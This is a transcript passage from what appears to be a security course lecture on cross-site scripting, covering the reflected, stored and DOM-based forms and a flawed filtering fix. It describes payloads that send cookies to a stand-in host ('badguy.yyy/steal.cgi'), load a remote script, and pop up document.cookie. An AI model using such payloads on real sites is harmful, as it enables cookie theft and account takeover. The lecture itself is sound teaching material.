[MUSIC] The next slide shows the essence of a cross-site scripting. If you go to a web page, the web server sends over commands, and your web browser interprets those commands to draw up an image. Now, if you look at the first HTML, which is the language used for these web pages, this one says, start a paragraph and say hello. And then the script tags say, between the beginning and the end of these tags, execute whatever is there. And in this case, it's something you don't expect and don't want, which is nasty. That's what is called malicious logic. So what happens in this case is the web browser first puts up hello with the exclamation point and then does the commands in the middle. And that's cross-site scripting. There are three forms of these attacks, reflected, stored, and what's called DOM injection. The next slide shows a reflected attack. We have a website that requires you to authenticate to gain access. Once you've gained that access, the web stores essential cookie. So the cookie is stored wherever your browser stores cookies. And the next time you connect to that site, that site will say, send over your cookies, the authenticate cookie goes over along with any others. And then the site says, okay, you're authenticated, we'll just go ahead and act. Now, the way the attack usually works is the attacker sends out a large number of messages, emails typically, with a URL in them, and the URL basically points to the remote site. But what it does is it contains a script, and the script will simply say, copy the cookies for that site, and send them to this second site, the bad guy and gal's site. So if you look at the HTML there, it's going to draw up an image. And by the way, when this is done, the image is often very small, like a pixel, so you can't see it. But in this case, the image it's going to draw is simply something from xxx.yyy. However, when you try to log in to that account there, you've got a script. And so what the script does is it goes to the data and then sends over the URL http://badguy.yyy/steal.cgi?, concatenated with the cookie for the appropriate website, that is xxx.yyy. And you can access that even if you have third-party cookies turned off because it's being requested by the web page you're going to, so it goes ahead and sends that out. And then presumably what will come back is the legitimate name of the account, and then you'll be able to go ahead and log in. So when the victim clicks on that particular URL, the attacker gets all the cookies, and thereby access as the victim. Going onto the next slide, that's through the email and such. But spam filters are fairly good about finding those. And in general, a good rule of thumb is don't click on it if you don't know what's there. Or your mail system may not show HTML, may not draw HTML pages when you look at the mail. So there's another trick you can use. Most people have gone to a blog at least once in their life, and you see that remote people can enter information into the blog. The data that you enter into the blog, the blog entry, is saved on the server. And then when someone comes in to view the blog, among other things, that entry will come up. Well, that entry comes up and is drawn there on your browser. So why not embed commands in that? And that's basically what a stored cross-site scripting is. The attack stores the malicious URL or HTML on a page where you will go. And it's important to understand that it's not in the control of the person who controls the web server. Anyone who can write to the blog can do this sort of thing. So here is an example, if my blog allows me to insert HTML commands in what I enter into the blog when I'm typing my comment, and most of them do. If they don't check for particular commands, I can enter something like the line under the blog comment allows this. And what it will do is it will go ahead and download the script from mysite/messwithyou.js, JavaScript, and then go ahead and execute it in your browser. So what happens is if that command is in the blog, the next person to look at it gets caught, and messwithyou will go ahead and run in your browser. Now, the next slide talks about something that's a little bit more complex, it's called DOM, Document Object Model. And this is really how browsers work, they get a Document Object Model, and then use that model to display the object, which is parts of a web page. Now, the reason this is interesting is because stored XSS and reflected XSS, you assume that the web page you're storing, or going to, or whatever is static. DOM XSS is similar, but it allows you to do a little bit more. Since that remote page is static and loaded in your browser when you visit, there's a, for example, a web page. It's going to write out the URL. The base URI of the document with the URL is the prefix, and document.write will put it up on your browser so you can see it. So the request that I send is listed below. Now, what happens is, when the web browser receives that URL, as soon as it gets to the sharp sign, it instantiates the page and then executes what's between scripts. And so that will be an alert, which will cause a beep. So now, when we go to this web page, it goes ahead and runs document.write URL, and then the pound sign gets instantiated, and they get a beep. So this is how DOM cross-site scripting works. Now, the next slide discusses combinations. And it's important to understand that attacks can get very complex, so these can be combined. The first two are fairly easy because they can be detected at the server, just look for scripts in the input URL, okay, or in the body. If you see those scripts as you're reading things or as your mail program is analyzing things, then you say, hey, wait a minute, and you've caught it. The problem is that the third one, the web pages on the server are static. But the DOM attack tricks your browser into putting up something that appears to be from the server, but has a few additions. So the source is where things come from, the sink is where things go. What you do is you look for sources that others control. On that web page, you have the document base URI, that's dynamic, that's going to be whatever it is in my browser. And as a result, when my browser goes to print that or draw it up on my screen, I am trusting whatever is there. So you need to be careful and be sure here that when you output something or accept something from the, Server and then proceed to draw that, you check it before you draw it. And we'll talk about a couple of ways to do this. First, the wrong way. Here is an attempted fix, okay? The basic idea here is that when I see a script here, I'm going to simply comment it out. So here's the web page, it's vulnerable. Notice the document.write, and the document.URL.substring, and the document.URL.length, all of that is JavaScript. And then notice that the pos is the indexOf("name="). So the idea is a parameter will come over, the parameter's key will be name, and then the value was whatever follows name equals, okay? So that's what pos does, it moves it beyond the end of name equals. So when you get the document.URL.length, that gives you the length beyond the name equals, which is simply going to be, presumably, the name of the person. And the URL substring pulls that out. And then the write simply writes up the name, so it would be, welcome, hi, Matt, or whatever. And then it will go on and say, welcome to our system, and so forth. Here's the attack, the next slide shows the legitimate one, vulnerable.site/welcome.html?name=Matt. And so when I go to that website with that URL, it'll say, hi, Matt, because it gets the name from the field following the name. But what happens if I do something a little nasty? The next one shows that. Now what happens is the name is a script, so the browser is going to execute alert(document.cookie), which will put up the cookie in an alert box. So this one is basically harmless, it notifies you that hey, look, I've got your cookie. But you can put a lot of other things within that script, anything JavaScript can do, you can put in there. So how do we avoid this? Let's try filtering, we scan the input for something that begins with script and then ends with a close script tag, this is on the next slide. Now, the problem is that script, so why don't we just comment it out? That's easy solution, and you can see where it says, and replace them with this. What I've done is I've replaced script with an open comment, and I've replaced /script, the closing tag, with a close comment. And now when that web page comes up on my browser, it sees the comment, it sees the